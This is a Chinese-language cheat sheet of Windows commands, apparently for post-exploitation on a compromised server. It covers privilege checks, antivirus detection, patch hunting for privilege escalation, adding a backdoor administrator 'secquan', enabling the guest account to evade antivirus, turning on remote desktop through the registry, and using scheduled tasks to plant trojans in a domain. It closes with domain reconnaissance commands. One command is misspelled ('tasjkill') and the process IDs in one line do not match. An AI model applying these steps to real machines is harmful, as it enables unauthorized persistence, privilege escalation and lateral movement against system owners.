whoami查看当前权限,当不是administrator或者system时需要提权
ipconfig,查看服务器为内网还是外网,内网进服务器则需要转发端口
quser或者是query user查看管理是否在线
systeminfo查看服务器信息及相应的补丁,可找相应的补丁提权
tasklist查看当前运行的进程,是否有av(杀软),可利用的第三方的服务提权等
net user查看用户,当发现可疑用户时,可以弱口令尝试一波,因为可能是前辈的脚印,大多数都是弱口令
net user secquan secquan /add添加一个账号密码为secquan的用户,当权限不足时或者有av拦截会提示拒绝访问然后一般会出现一个数字5
net localgroup administrators secquan /add将secquan这个用户加到管理组
激活guest账户 net user guest /active:yes ,重复第6步,将guest账户提升至管理员 可用于被杀软拦截无法添加用户
删除用户 net user secquan /del
查看远程端口 通过tasklist /svc 找到相应服务名的pid 然后通过netstat -ano 查到相应的pid的端口号
查看远程端口或者使用注册表(REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber)再set /a a=0xd3d
当远程桌面服务被关闭时,可以用注册表命令开启(REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f)
结束进程,taskkill /im mspaint.exe或者taskkill /pid pid号。结束1484这个进程 tasjkill /pid 4048
注释: /IM image name 指定要终止的进程的
set查看命令组件是否可执行
at 定时任务,常用于域中种马
sc qc 查看mysql查看服务运行权限和路径的
例如创建一个Windows11的服务 1、sc create Windows11 binpath= "net user >> D:\1.txt" displayname= "Windows12" depend= Tcpip start= auto
开启服务的命令 net start Windows11
删除服务的命令 sc delete Windows11
查看adexx用户的权限以及所在的组 net user adexx
net localgroup “Remote Desktop Users” adexx /add 把adexx这个用户加入远程桌面用户组
域的基本命令:
查询域用户:net user /domain
查询域管理员用户:net group "domain admins" /domain
查询域里面的工作组:net group /domain
查询域名称:net view /domain
查询域内计算机:net view /domain:XX
查询域控制器:net time /domain
查看域控:net group "Domain controllers"
查询所有域控制器:dsquery server
查询登录本机的域管理员:net localgroup administrators /domain
将域用户添加到本机:net localgroup administrators workgroup\user001 /add
查询当前登陆域:net config workstation
查询域密码策略:net accounts /domain